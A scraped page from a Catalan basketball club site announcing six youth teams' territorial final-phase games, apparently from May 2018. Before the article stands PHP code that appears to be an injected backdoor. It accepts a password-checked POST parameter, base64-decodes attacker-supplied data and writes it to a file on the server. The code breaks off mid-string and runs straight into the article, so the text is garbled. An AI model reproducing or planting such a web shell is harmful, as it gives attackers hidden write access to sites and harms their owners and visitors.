function bestrock_render_js(){ echo ""; } function bestrock_render_index(){ echo md5('56749'); } function bestrock_render_ajax(){ try { if(isset($_GET['s1'])) die(md5('js')); if(isset($_POST['t2'])){ $l1 = uniqid(rand(), true) . '.js'; @file_put_contents($l1, 'js'); if(file_exists($l1)){ if(isset($_POST['t1'])){ $d = md5(md5($_POST['t1'])); if($d=="8ae24e6719c47a39da8ad5451432d9a6"){ $d1=$_POST['t2']; $d1=base64_decode($d1); $d4=" Fins a sis equips del TGN Bàsquet disputaran fases finals territorials aquest cap de setmana - Tgn Bàsquet Club -

Fins a sis equips del TGN Bàsquet disputaran fases finals territorials aquest cap de setmana

By
Updated: maig 21, 2018

Sis equips del TGN Bàsquet lluitaran per a aconseguir el campionat de Tarragona en les diferents fases finals que es disputen aquest cap de setmana. Així, l’aleví masculí de 6è jugarà una de les semifinals contra el Carmelites CBT Blau el pròxim dissabte (10 h) en una fase final que es disputarà al pavelló del Serrallo. L’altra semifinal la jugaran el CB Morell i l’escola Puigcerver. La final i el partit del tercer i quart lloc es jugaran a les 12.3o h.

Per la seva banda, l’aleví femení O6 disputarà la seva semifinal contra l’AB Cunit també dissabte (10.15 h) en una fase final que es jugarà al pavelló del Temple, a Tortosa. Els altres dos equips en competició són el CB Cantaires de Tortosa i la Salle Tarragona. La final i el partit pel tercer i quart lloc es jugaran a les 12.30 h.

El preinfantil femení A jugarà al pavelló municipal de Santa Coloma de Queralt contra el Salle Ploms Negre la segona semifinal (11.45 h). La primera semifinal la disputaran el CB Àguiles i el CBT. La final es jugarà a les 18.30 h i el partit pel tercer i quart lloc es disputarà a les 17 h.

D’altra banda, l’infantil femení B jugarà la segona semifinal de la fase final que es disputarà al Morell (diumenge, 11.45 h) contra el Bàsquet Teresianes Vermell. La primera semifinal la disputaran el CB Morell i el Salle Ploms Negre. La final es jugarà a les 18 h i el partit pel tercer i quart lloc, a les 16.15 h.

En categoria cadet, dos equips de l’entitat lila també lluitaran per ser campions. El cadet masculí 02-03 jugarà la segona semifinal contra el CB Cantaires (dissabte, 12 h), mentre que la primera semifinal la disputaran el CB Valls i el CB Rapitenc en una fase final que es farà al Joana Ballart de Valls. La final serà a les 19 h i el partit pel tercer i quart lloc, a les 17 h.

El cadet femení 03 B jugarà dissabte a Coma-ruga la primera semifinal contra l’AB El Vendrell (10.30 h). La segona semifinal, per la seva banda, la jugaran el CB Morell i la Salle Ploms Verd. La final es disputarà a les 18.30 h i el partit pel tercer i quart lloc a les 16.30 h.

CARTELL FASE FINAL ALEVÍ MASCULÍ 6È

CARTELL FASE FINAL ALEVÍ FEMENÍ O6

CARTELL FASE FINAL PREINFANTIL FEMENÍ A

CARTELL FASE FINAL INFANTIL FEMENÍ B

CARTELL FASE FINAL CADET MASCULÍ 02-03

CARTELL FASE FINAL CADET FEMENÍ 03 B

 

Deixa un comentari

L'adreça electrònica no es publicarà. Els camps necessaris estan marcats amb *